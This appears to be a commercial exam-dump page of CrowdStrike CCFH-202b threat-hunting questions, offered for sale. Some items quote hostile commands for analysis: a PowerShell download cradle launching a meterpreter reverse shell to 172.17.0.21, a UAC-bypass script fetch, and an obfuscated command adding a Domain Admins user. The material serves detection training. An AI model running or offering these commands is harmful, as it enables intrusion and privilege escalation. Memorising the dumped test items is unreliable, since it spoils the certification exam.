Spring Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: Board70

CCFH-202b Exam Dumps - CrowdStrike CCFH Questions and Answers

Question # 4

You are investigating an alert for a process that connected to the following suspicious domain: reallysuspiciousdomain[.]com. Which of the Investigate dashboards would provide a list of processes that looked up the specified domain?

Options:

A.

IP addresses

B.

Bulk domains

C.

Geo location activity

D.

Remote access graph

Buy Now
Question # 5

You are investigating a process tree where WmiPrvSE launched PowerShell with the following command:

powershell.exe Windowstyle Hidden noprofile noexit -c IEX ((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/.../Invoke-Shellcode.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 172.17.0.21 -Lport 8080 -Force

What is this command doing?

Options:

A.

Using PowerShell to perform a discovery scan of 172.17.0.21 on port 8080

B.

Utilizing PowerShell to force a connection to a reverse shell originating from GitHub

C.

Utilizing PowerShell to download a reverse shell from GitHub and executing it to create a connection

D.

Using WMI to update the PowerShell execution policy on a remote host

Buy Now
Question # 6

Refer to the exhibit.

While investigating a process tree, you hover over a malicious powershell.exe process. What is the correct sequence of Process Actions?

Options:

A.

7 Network Operations, 4 Disk Operations, 8 DNS Requests, 61 Process Operations

B.

8 Network Operations, 61 Disk Operations, 4 DNS Requests, 2 Process Operations

C.

7 Network Operations, 4 Disk Operations, 61 DNS Requests, 2 Process Operations

D.

7 Network Operations, 4 Disk Operations, 61 DNS Requests, 8 Process Operations

Buy Now
Question # 7

You want to use result data from an Advanced Event Search to create a custom dashboard that will display the total number of detections in a seven-day time period. Which widget will allow you to display the total number of detections as a single value digit?

Options:

A.

Gauge Widget

B.

Time Chart Widget

C.

Scatter Chart Widget

D.

Heat Map Widget

Buy Now
Question # 8

While performing a hunt for unusual PowerShell commands, you discover the following command being run on a single host:

powershell.exe "(New-Object Net.webclient).Downloadstring('https://raw.githubusercontent.com/.../invoke-AppPathBypass.ps1')"

The process tree for this command looks like this:

winlogon.exe > userinit.exe > explorer.exe > powershell_ise.exe > powershell.exe All of the commands are run during normal working hours under the account of a user from the IT department. What should be your next steps in the investigation?

Options:

A.

Start an RTR (Real Time Response) session on the host. Check the user's Downloads folder for the file AppPathBypass.ps1 and analyze the file for malicious content.

B.

Mark the detection as True Positive. Trigger an automated remediation to remove all malicious files and methods of persistence.

C.

Mark the detection as a False Positive because nothing happened on the host.

D.

Perform a +/- 10-minute search for events around this process execution to get more context. Contact the user to confirm whether or not this was testing-related activity.

Buy Now
Question # 9

Which Investigate tool will show you which users have logged in to a particular server?

Options:

A.

Search by agent ID

B.

Host search

C.

User Search

D.

Bulk domains

Buy Now
Question # 10

What will the following obfuscated command do?

cmd /c "set x=^n^e^t & set y=@er & set yy=z & set z=r & set r=remove & set f=Domain+ff & set ff=Admin & set g=gumball@ & echo %x%%y:@=us% /%z:r=add% %ff% %g:@=r% | cmd"

Options:

A.

Add a user named “Admin” to the local host

B.

Remove a user named “Admin” from the local host

C.

Change the password for a user named “Admin” to “%g:@=r%”

D.

Add a user named “Admin” to the Domain Admins group

Buy Now
Question # 11

You want to hunt for the least-used Windows services that are starting from non-standard locations. Which query below will provide this information?

Options:

A.

#event_simpleName=ServiceStarted ImageFileName!=/(\\servicing\\|\\SysWOW64\\)/i | groupBy([ServiceDisplayName], function=[collect([ImageFileName] ), count(as=count)], l imit=20000) | sort(field=count, limit=20000, order=asc)

B.

#event_simpleName=ServiceStarted ImageFileName!=/(\\servicing\\|\\Services\\)/i | groupBy([ServiceDisplayName], function=[collect([ImageFileName] ), count(as=count)], limit=20000) | sort(field=count, limit=20000, order=asc)

C.

#event_simpleName=ServiceStarted ImageFileName!=/(\\servicing\\|\\System32\\)/i | groupBy([ServiceDisplayName], function=[collect([ImageFileName] ), count(as=count)], limit=20000) | sort(field=count, limit=20000, order=asc)

D.

#event_simpleName=ServiceStarted ImageFileName=/(\\System32\\)/i | groupBy([ServiceDisplayName], function=[collect([ImageFileName] ), count(as=count)], limit=20000) | sort(field=count, limit=20000, order=asc)

Buy Now
Question # 12

What is the expected result of this CQL query?

#event_simpleName=UserLogon RemoteAddressIP4=* | !cidr(RemoteAddressIP4, subnet=["224.0.0.0/4", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/32"]) | ipLocation(field=RemoteAddressIP4, as="ip")

Options:

A.

All remote user network connection events from external IP addresses

B.

All remote user network connection events from internal IP addresses

C.

All user logons originating from internal IP addresses

D.

All user logons originating from external IP addresses

Buy Now
Question # 13

You've been tasked with writing a query that would rename the RemoteAddressIP4 field to SourceIP. What would be the correct syntax using the rename() function?

Options:

A.

| rename(RemoteAddressIP=SourceIP)

B.

| rename(RemoteAddressIP4, as=SourceIP)

C.

| rename(RemoteAddressIP4 > > SourceIP)

D.

| rename(RemoteAddressIP4 := SourceIP)

Buy Now
Exam Code: CCFH-202b
Exam Name: CrowdStrike Certified Falcon Hunter
Last Update: Apr 5, 2026
Questions: 60
CCFH-202b pdf

CCFH-202b PDF

$25.5  $84.99
CCFH-202b Engine

CCFH-202b Testing Engine

$28.5  $94.99
CCFH-202b PDF + Engine

CCFH-202b PDF + Testing Engine

$40.5  $134.99